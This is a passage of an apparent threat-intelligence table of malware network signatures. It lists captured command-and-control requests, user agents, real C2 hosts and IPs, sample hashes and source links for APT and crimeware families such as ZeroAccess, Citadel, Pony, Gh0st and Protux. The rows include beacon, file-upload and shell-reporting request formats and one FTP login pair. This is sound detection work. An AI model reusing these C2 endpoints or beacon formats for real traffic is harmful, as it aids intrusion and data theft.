138 | 2013-05-01 | CRIME | Avatar Rootkit | GET | /search?query=EZTFDHWP&sort=relevance http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance | &sort=relevance | /search?query=EZTFDHWP&sort=relevance Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLP. 3.0.30729; Media Center PC 6.0) Host: groups . yahoo. corn | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLP. 3.0.30729; Media Center PC 6.0) | SymFilter(UpperCase(Base64(Encrypt(17BTN1)))) = EZTFDHWP EZTFDHWP is used for the subsequent search request on Yahoo groups. - see paper for more info | Dropper1 (BTN1 botnet) – b2b3bb4b7c5a050a583246a8abe5a79d723b8b57 Dropper2 (NET1 botnet) – 93473126a9aa13834413c494ae5f62eec1016fde | http://www.welivesecurity.com/2013/05/01/mysterious-avatar-rootkit-with-api-sdk-and-yahoo-groups-for-cc-communication/ | http://bit.ly/crimesamples | Global\{%s}`000000000000000000000000000000002 Global\{%s}`000000000000000000000000000000001 Unicode \KernelObjects\%SCondition`0000000000000 %suxtheme.dll;%scryptbase.dll | 2013-05 | |||
139 | 2013-04-30 | APT | 9002 | POST | 9002..................wx....9002..................wx....9002....................... | 9002 | 9002..................wx....9002..................wx....9002........................9002........!............. .....9002..... .............p.....MZ..................@..:...X..'........!..L.!This program cannot be run in DOS mode. | D4ED654BCDA42576FDDFE03361608CAA 3de314089db35af9baaeefc598f09b23(doc dropper) 2568615875525003688839cb8950aeae (doc dropper) | http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | 2013-02 | |||||
140 | 2013-04-30 | APT | MSWab /Yayih | POST | /bbs/info.asp | /info.asp | /bbs/info.asp Host: 199.192.156.134:443 Content-Length: 100 Connection: Keep-Alive Cache-Control: no-cache 3D333531501A7770a...H...H...XPSP3-OFC2007-R|us0302|10.0.2.15|WinNT v5.1 build 2600 - Service Pack 3|HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: ......, 04 .... 12 15:09:11 GMT Content-Length: 12 Cache-Control: no-cache | FD1BE09E499E8E380424B3835FC973A8 | http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fYayih.A#techdetails_link http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html#more http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fYayih.A#techdetails_link | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | 2012-03 | |||||
141 | 2013-04-30 | CRIME | ZeroAccess / Sirefef | GET | /stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25 /count.php?page=952000&style=LED_g&nbdigits=9 | /stat2.php?w= | HOST: iivxhdcd.cn User-Agent: Opera/6 (Windows NT 5.1; U; LangID=409; x86) Connection: close " ---------------------------------------------- 2013-05 ip check /app/geoip.js HTTP/1.0 Host: j.maxmind.com Connection: close followed by counter checkin----------- /count.php?page=952000&style=LED_g&nbdigits=9 Host: www.e-zeeinternet.com User-Agent: Opera/10 (Windows NT 5.1; US; x86) Connection: close HTTP/1.1 200 OK Date: Tue, 07 May 2013 11:02:01 GMT Server: Apache/2.2.24 Set-Cookie: ez_counter_952000=1 Content-Length: 255 Connection: close Content-Type: image/png .PNG. | The user agent is either Opera 5, 6, or 7, and may include a “LangID” parameter as in: Opera/6 (Windows NT %u.%u; U; LangID=%x; x86) | ZeroAccess contains a domain generation routine that is used to populate the HOST header of the above requests. The domain generation routine generates a date-based, 8-character .cn domain. The following snippet illustrates the domain generation, and has been observed in use in a number of versions of ZeroAccess. | http://blog.avast.com/2013/05/03/regents-of-louisiana-spreading-sirefef-malware/ http://malforsec.blogspot.no/2013/02/zeroaccess-analysis-part-i-network.html http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/trojan_zeroaccess_infection_analysis.pdf | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 2012-03 | ||||
142 | 2013-04-30 | CRIME | ZeroAccess / Sirefef ppc fraud - redirect | GET | HTTP/1.1 302 Moved Temporarily | Server: nginx/0.9.3 Date: Mon, 28 Nov 2011 02:00:11 GMT Connection: keep-alive Location: http://www4search.net/?keyword=akbar+jobs&p=0| 0|eaeab70d-72b8-4492-8666-27bbd7174489 Content-Length: 0 | Server response | http://blog.avast.com/2013/05/03/regents-of-louisiana-spreading-sirefef-malware/ http://malforsec.blogspot.no/2013/02/zeroaccess-analysis-part-i-network.html http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/trojan_zeroaccess_infection_analysis.pdf | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 2012-03 | ||||||
143 | 2013-04-30 | APT | 9002 | POST | /2d | /2d | HTTP 189/0 HTTP/1..1 HTTP 189/1 HTTP 189/2 HTTP 189/3 HTTP 189/4 HTTP 189/f HTTP 190/10 HTTP 190/11 /2d HTTP/1. 1 Use-Agent: lynx Host: ieee.boeing-job.com Content-Length: 2 Connection: Keep-Alive Cache-Control: no-cache AA | lynx | 3de314089db35af9baaeefc598f09b23(doc dropper) 2568615875525003688839cb8950aeae (doc dropper) | http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html | 2013-02 | ||||||
144 | 2013-04-30 | CRIME | Asprox / Kuluoz gets list of C2s | GET | /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0 | /4213D5182A41F58F3D01D8208B0BE9633A985A4C35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 178.77.103.54:8080 | Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | 8080 | acquire the latest list of C&C server location | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf | 2013 | ||||||
145 | 2013-04-30 | CRIME | Asprox / Kuluoz Checkin | GET | /4213D5182A41F58F3D01D8208B0BE9633A985A4C 35C70A97FF61249661F38426DA71D12B40F9A512B 6C945CD85462CD565962B6C5CACB1B09F86B1651 EB971F3013D14695028FE0BEBD838B9D3C5DE002 EA95371E51B0E8CFB7567F6BF | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 178.77.103.54:8080 | Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | 8080 | initial “check-in” communication The URL path is RC4 encrypted, the key to which is the first eight characters: key = “4213D518” | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf | |||||||
146 | 2013-04-30 | CRIME | Asprox / Kuluoz GETs spam template | GET | /78dc91f1D56B9COC18B818A7A2B272F43O3A621C AEOC17O479E4E9A69B82 | /78dc91f1D56B9COC18B818A7A2B272F43O3A621CAEOC17O479E4E9A69B82 Content-Type: application/x-www-form-urlencoded Content-Transfer-Encoding: base64 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) Host: 50.22.136.150:8080 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) | 8080 | Other communications look very similar except forr different content type - depending on activity. See the reference. The smtpWorker.dll.crp (smtpWorker.dll) module is downloaded when the C&C server issues the command, c=rdl&u=/get/smtpWorker.dll.crp&a=0&k=9c59ca70&n=. using Kuluoz downloader.GETting spam template | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf | 2013 | ||||||
147 | 2013-04-30 | CRIME | Carberb | POST | /kmqkcicalxrntrngwdxjyxztxcqkoyjn bdoafqirgnwwvpcjqglucovna.htm | Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: caaarrp2.ru Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 60 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) | content of the form like this: kfq=u%2FFPG1eImmXBEb3mG5VomEqE9ivVw2uh550qE1K2LoqWfJkbTeN%3D where ‘kfq’ is a randomly generated string which is concatenated with the equality sign and an encoded message | http://blog.avast.com/2013/04/08/carberp_epitaph/ | 3/1/2012 | |||||||
148 | 2013-04-30 | CRIME | FakeAV var (via Kuluoz - Asprox botnet) | GET | /AFC392A9570E45C188F468429F6349E82ABF530D 32184946F872BB899FAECD808398A1630AEB78FE6EE44AB3 34A67A0A45B4ED8A690330E832085902F0146216 16CEB4AF702F4E5B37A9F53B21242F | /AFC392A9570E45C188F468429F6349E82ABF530D32184946F872BB899FAECD808398A1630AEB78FE6EE44AB334A67A0A45B4ED8A690330E832085902F014621616CEB4AF702F4E5B37A9F53B21242F User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 208.88.5.229:808 | Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | 8080 | b64b5af4262cf23f3fbc54448c6311d8 | http://www.nsai.it/2013/01/23/italian-dhl-spam/ https://www.virustotal.com/en/file/c49f7dbc036ad0a86df02cbbde00cb3b3fbd651d82f6c9c5a98170644374f64f/analysis/ | |||||||
149 | 2013-04-30 | APT | Favorites | GET | /download731106?h1= FIFEFDAHAPGDENCMFOFFFCAGAE | /download731106?h1= | /download731106?h1=FIFEFDAHAPGDENCMFOFFFCAGAE Accept: / User-Agent: Mozilla/5.0 (compatible; Windows NT 5.1) Host: 140.112.19.195 Connection: Keep-Alive | Mozilla/5.0 (compatible; Windows NT 5.1) | Download file to victim | 5e3eaca3806769836c3ad9d46a209644 | http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/ | 2010-09 | |||||
150 | 2013-04-30 | APT | Favorites | GET | /search?qu= | /search?qu= | User-Agent: Firefox/2.0.0.2 Host: www.google.com Content-Length: 4 Connection: Keep-Alive | Trojan first beacons to www.google.com. This is a decoy beacon that does not affect the behavior of the Trojan in any way: | 5e3eaca3806769836c3ad9d46a209644 | http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/ | 2010-09 | ||||||
151 | 2013-04-30 | APT | Favorites | GET | /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEF DAHAPGDENCMFOFFFCAGAE | /search59861?h1= | /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEFDAHAPGDENCMFOFFFCAGAE Accept: / User-Agent: Mozilla/5.0 (compatible;BKANAHEAFPEM;) Host: 140.112.19.195 Connection: Keep-Alive | Mozilla/5.0 (compatible;BKANAHEAFPEM;) | Where: search5 is a hardcoded value, whereas: 5910 is a random number. And: ?h1= is hardcoded, whereas: 51 is the Windows version (i.e. Win XP 5.1) And: &h2=1&h3= is hardcoded, as is: BHI06233 And: &h4= is hardcoded, whereas: FIFEFDAHAPGDENCMFOFMFMAEAE is the encoded (volume serial number concatenated with a random number) And: BKANAHEAFPEM is the encoded machine name (in this case victim). | 5e3eaca3806769836c3ad9d46a209644 | http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/ | 2010-09 | |||||
152 | 2013-04-30 | APT | Favorites | GET | /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE | /search613522?h1= | /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE Accept: / User-Agent: Mozilla/5.0 (compatible; Windows NT 5.2) Host: 140.112.19.195 Connection: Keep-Alive | Mozilla/5.0 (compatible; Windows NT 5.2) | The Trojan continues the communication with the C2 node by sending thisrequest: | 5e3eaca3806769836c3ad9d46a209644 | http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/ | 2010-09 | |||||
153 | 2013-04-30 | APT | Favorites | POST | /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH | /search25548?h1= | /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH User-Agent: Mozilla/5.0 (compatible;Windows NT 5.1) Host: 140.112.19.195 Content-Length: 127 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/5.0 (compatible;Windows NT 5.1) | Command Shell This command takes no arguments. The Trojan executes cmd.exe on the local machine and sends the followingrequest to the C2 node: | 5e3eaca3806769836c3ad9d46a209644 | http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/ | 2010-09 | |||||
154 | 2013-04-30 | APT | Favorites | POST | /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE | /upload8806?h1= | /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE Accept: / User-Agent: Mozilla/5.0 (compatible;Windows NT 5.2) Host: 140.112.19.195 Content-Length: 41 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/5.0 (compatible;Windows NT 5.2) | request to the C2 node followed by the encrypted data of the requested file (shown as a hex dump): | 5e3eaca3806769836c3ad9d46a209644 | http://www.cyberengineeringservices.com/msupdate-exe-favorites-dat-analysis/ | 2010-09 | |||||
155 | 2013-04-30 | APT | Gh0st | GET | /cgi/online.asp?hostname= [COMPUTERNAME]&httptype=[1][not%20httptunnel] | /cgi/online.asp?hostname= | /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: dns.yimg.ca Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0; Win32) | 04e237ad7f600bfc942f326f903dc9d8 6a5dde931418e0549163fdb024e4f2ed 265b38204738c9c0adc612142f861022 | http://blog.trendmicro.com/trendlabs-security-intelligence/malicious-pdfs-on-the-rise/ | 2013-04 | ||||||
156 | 2013-04-30 | APT | Gh0st var | GET | /h.gif?pid =113&v=130586214568 HTTP/ 1. 1 | /h.gif?pid =113 | /h. gif ?pid =113&v=130586214568 HTTP/ 1. 1 Accept: / Accept-Language: en-us Pragma: no-cache User-Agent: Mozilla /4.0(compatible; MSIE 6.0; Windows NT 5.1) Connection: Keep- Alive HTTP/1.0 200 0K Content-type: text/html. Content- l..ength:0 PCRatb . . . X. . . x . . . q. s. 2406. . . . S. . P. . c. 1. 4R. u. . .1—I . . . .1.1I ..al..bf.....ga..QUS.Z\..._\ s..PCRat x | Mozilla /4.0(compatible; MSIE 6.0; Windows NT 5.1) | http://labs.alienvault.com/labs/index.php/2012/new-macontrol-variant-targeting-uyghur-users-the-windows-version-using-gh0st-rat/ | 2012-06 | |||||||
157 | 2013-04-30 | CRIME | Guntior - CN bootkit | GET | /yx/tongji.html | /tongji.html | /yx/tongji.html Accept: /.. Accept-Language: en-u Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0 Windows NT 5.1; SV1; .NET CLR 2.0.50727) Host: localhost:690 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0 Windows NT 5.1; SV1; . NET CLR 2.0.50727) | 15e692cf34a70fb364591622bff1e43a | http://www.threatexpert.com/report.aspx?md5=15e692cf34a70fb364591622bff1e43a | 2012-12 | ||||||
158 | 2013-04-30 | CRIME | Kuluoz.B downloader | GET | /index.php?r=gate&fq=acc0e9de&group=sl15&debug=0 | /index.php?r=gate& | <site>/index.php?r=gate&fq=acc0e9de&group=sl15&debug=0 | http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader%3AWin32%2FKuluoz.B&ThreatID=173812#techdetails_link | |||||||||
159 | 2013-04-30 | CRIME | Ranbyus / Triton (Spy, Banking, smart cards) | POST | /releases/index.php | /index.php | /releases/index.php Content-Type: multipart/form-data, boundary=7DD02020A0D0000 User-Agent: gsa-crawler Host: ___.__ Content-Length: 226 Connection: Keep-Alive Cache-Control: no-cache --7DD02020A0D0000 Content-Disposition: form-data; name="q" vUMgjQs0ow2xoty3oJn3jt9z1tjtfJnybZda1zEwjJ9toUSxnKoy9xoF8zNgjesNbTs+oes+owfzYJDzot9+jTDlna+X8USgvzEu8/fpve2VnaVFYJDa9QMgj6fwYJczjTqafZjgjtcaGT2tje9xjq== --7DD02020A0D0000 | gsa-crawler | see all values explained in the article | F2744552D24F7EA31E64228EB3022830 | http://inresearching.blogspot.ru/2013/02/trojanwin32spyranbyus.html http://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/ http://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/ http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2462 | ||||||
160 | 2013-04-30 | CRIME | Urausy (Ransomware) | GET | /ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php | _.php | /ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 Host: giwje.org Cache-Control: no-cache | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 | 99f31640347259d3d2b18105e493989e b5cdc60ec5dfee61a9567e69ea7b59df 2814562a614f6d3fe9b22d2329b016dc 06/09/12 58c5971869a315f12f319232d1f84f87 15/09/12 54a3874120c84aa0d1e9ddcd8e60052f 22/09/12 b98af65946f3025709e7283370c67d9d 31/01/13 | https://www.botnets.fr/index.php/Urausy | |||||||
161 | 2013-04-29 | APT | Glasses | GET | /ewpindex.htm | /ewpindex.htm | User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; Clj26Dbj.XYZ) Host: ewplus.com Cache-Control: no-cache | The HTTP request includes a marker in the User-Agent string, indicating that it is was sent by this malware: The marker string has two parts, separated by a period. The first part (“Clj26Dbj”) is an encoded version of the computer’s name, presumably for tracking which machines at an organization are infected. The second part (changed to “XYZ” here) appears to be a campaign code | https://citizenlab.org/2013/02/apt1s-glasses-watching-a-human-rights-organization/ | 2013-02 | |||||||
162 | 2013-04-29 | APT | IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRAT | POST | /index000000001.asp | /index000000001.asp | Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;) Host: update.microsoft.com Connection: Keep-Alive Content-Type: text/html Content-Length: 000041 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;) | The Accept-Language, User-Agent, Connection, and Content-Type headers are always fixed. The Host header is also always fixed as update.microsoft.com; any requests to the C2 server made without this header in place will be rejected, often with a redirect to Microsoft’s website. | d7c826ac94522416a0aecf5b7a5d2afe | https://citizenlab.org/wp-content/uploads/2012/09/IEXPL0RE_RAT.pdf | 2012-08 | |||||
163 | 2013-04-29 | APT | LURK | GET | LURK0........x.kf.e.apgpbpa0c..#........ | LURK0........x.kf.e.apgpbpa0c..#........ L.>...!`1..f.rF.......$..#.... ...........fHe(b(c.dH.........l ..:..r.."...!..P ....v...V`z0d0`0.../.T.....g.)LURK0........x.c...... | also see http://www.threatexpert.com/report.aspx?md5=fe3447a7ba0b40b2b0cff5a0dedcd387 | https://citizenlab.org/wp-content/uploads/2012/07/10-2012-recentobservationsintibet.pdf http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2012-07 and 2012-10 | |||||||
164 | 2013-04-28 | APT | DNSWatch / Protux | GET | /dns/dnslookup?la=en&host=picture.ucparlnet. com&type=A&submit=Resolve | /dnslookup?la= | 2011-05 /dns/dnslookup?la=en&host=picture.ucparlnet.com&type=A&submit=Resolve User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0) Host: www.dnswatch.info Cache-Control: no-cache 2012-11 /dns/dnslookup?la=en&host=vcvcvcvc.dyndns.org&type=A&submit=Resolve User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0) Host: www.dnswatch.info Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0) | Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0) | The Trojan first tries to resolve its hostnames indirectly by sending the following type of request to www.dnswatch.info over TCP port 80: | 06ddf39bc4b5c7a8950f1e8d11c44446 2012 D4C6CD7276019CB861286ECC6B0525BE (rtf dropper) 4F8A44EF66384CCFAB737C8D7ADB4BB8 | http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/ http://doc.emergingthreats.net/bin/view/Main/2014359 | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | \Program Files\xerox\ Find fuck process.%s it.dat jqda///dfy gzqu tdfeedt. \hon hongzinst ~Thumbddb.tmp OpenKeyEx Failed.%s,Error:%d | 2011-05 | ||
165 | 2013-04-28 | APT | DNSWatch / Protux | GET | /news.jpg | /news.jpg | /news.jpg Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) Host: checkerror.ucparlnet.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) | The Trojan sends this type of request to checkerror.ucparlnet.com (this DNS query is done normally): | 06ddf39bc4b5c7a8950f1e8d11c44446 2012 D4C6CD7276019CB861286ECC6B0525BE (rtf dropper) 4F8A44EF66384CCFAB737C8D7ADB4BB8 | http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/ http://doc.emergingthreats.net/bin/view/Main/2014359 | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | \Program Files\xerox\ Find fuck process.%s it.dat jqda///dfy gzqu tdfeedt. \hon hongzinst ~Thumbddb.tmp OpenKeyEx Failed.%s,Error:%d | 2011-05 | ||
166 | 2013-04-28 | APT | DNSWatch / Protux | POST | /PHqgHumeay5705.mp3 | /PHqgHumeay5705.mp3 | 2011-05 http://ssi.ucparlnet.com:80/PHqgHumeay5705.mp3 User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32) Host: ssi.ucparlnet.com Content-Length: 39 Proxy-Connection: keep-alive Pragma: no-cache 2012-11 http://vcvcvcvc.dyndns.org:8080/index.pl ?id=21378 User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32) Content-Type: multipart/form-data; boundary=----------2B9250BB47EE537B Host: vcvcvcvc.dyndns.org Content-Length: 272 Proxy-Connection: keep-alive Pragma: no-cache User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32) Host: ssi.ucparlnet.com Content-Length: 39 Proxy-Connection: keep-alive Pragma: no-cache | Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32) | It sent the following types of request to ssi.ucparlnet.com over TCP port 80 and picture.ucparlnet.com over TCP port 443 (NOT SSL): | 06ddf39bc4b5c7a8950f1e8d11c44446 2012 D4C6CD7276019CB861286ECC6B0525BE (rtf dropper) 4F8A44EF66384CCFAB737C8D7ADB4BB8 | http://www.cyberengineeringservices.com/ladens-death-doc-cve-2010-3333/ http://doc.emergingthreats.net/bin/view/Main/2014359 | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | \Program Files\xerox\ Find fuck process.%s it.dat jqda///dfy gzqu tdfeedt. \hon hongzinst ~Thumbddb.tmp OpenKeyEx Failed.%s,Error:%d | 2011-05 | ||
167 | 2013-04-28 | CRIME | Andromeda | POST | /new/gate.php | /gate.php | Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 Content-Length: 32 Host: seantit.ru mejRs96VP96+PIRfAjNy+Izj9E8jZscm | Mozilla/4.0 | 85F908A5BD0ADA2D72D138E038AECC7D | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/andromeda-bot-strings-CRIME.html | 2013-04 | |||
168 | 2013-04-28 | CRIME | Citadel | POST | /g.php | /g.php | Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) Host: nologo0091.org Content-Length: 122 Connection: Keep-Alive Cache-Control: no-cache ......y.....m.....x.).600Y.J.z......Yy.<(X.T..... .....A.w....a.....}(R.........T...-:.N..>..........qqm.n.......\.<.X@>.. | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-CRIME-2.html http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-CRIME-1.html | 2012-05 | ||||
169 | 2013-04-28 | CRIME | Citadel (Zbot var) | POST | /C270suqdh/file.php | /file.php | Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: vivaspace2013.com Content-Length: 122 Connection: Keep-Alive Cache-Control: no-cache ..Cx.oB...3.Yc>........8|....M.........8...E.a4.!.A...A+.z.Q...,\.\<\.#.$?.........@;...C'J-jL...R....)3.HP....eu....... | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; . NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | 3D6046E1218FB525805E5D8FDC605361 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-CRIME-2.html http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-CRIME-1.html | 4/26/2013 | |||
170 | 2013-04-28 | CRIME | Pony loader | POST | /ponyb/gate.php HTTP/1.0 | /gate.php | /ponyb/gate.php HTTP/1.0 Host: mail.yaklasim.com Accept: / Accept-Encoding: identity, ;q=0 Accept-Language: en-US Content-Length: 273 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) ...Y........XT..L.S[.lG...<^-.a..v.'..K~# ......#.IP...6......<.C.M!..lL7.....$.?._..N.k>.`=. | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimesamples | 2013-04 | ||||||
171 | 2013-04-28 | CRIME | Reedum | GET | 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] | 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] USER user37704 331 .................. ............ ...... ........................ user37704 PASS intro22 230 ........................ user37704 .................. TYPE A 200 ...... .................... .. A PORT 10,0,2,15,4,24 500 ........................ .............. PORT LPRT 6,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,4,24 500 LPRT .... .................... | 0ca4f93a848cf01348336a8c6ff22daf | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 2013-03 | ||||||
172 | 2013-04-28 | APT | APT1 WEBC2_RAVE | GET | /comp/sem/resources.htm | /resources.htm | User-Agent: HTTP Mozilla/5.0(compatible+MSIE) Host: www.cometoway.org Cache-Control: no-cache The Trojan parses (0x004016D0) the received data for the HTML comment tags: <!-- [Base64 encoded data] --> | HTTP Mozilla/5.0(compatible+MSIE) | a2534e9b7e4146368ea3245381830eb0 | http://www.cyberengineeringservices.com/analysis-of-file-winsrv-exe/ | http://contagioexchange.blogspot.com/2013/08/webc2-rave-strings-apt.html | 2011-05 | |||||
173 | 2013-04-28 | APT | backdoor ? | GET | /18110123/page_32262 308.html | /page_32262 308.html | Accept: Cookie: XX=0; BX=0 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32) Host: cuteoverload. dyndns . org Connection: Keep-Alive Cache-Control: no-cache Pragma: no-cache | Mozilla/4.0 (compatible; MSIE 8.0; Win32) | http://www.fireeye.com/blog/technical/cyber-exploits/2012/09/analysis-of-malware-page.html#more-14 | 2012-09 | |||||||
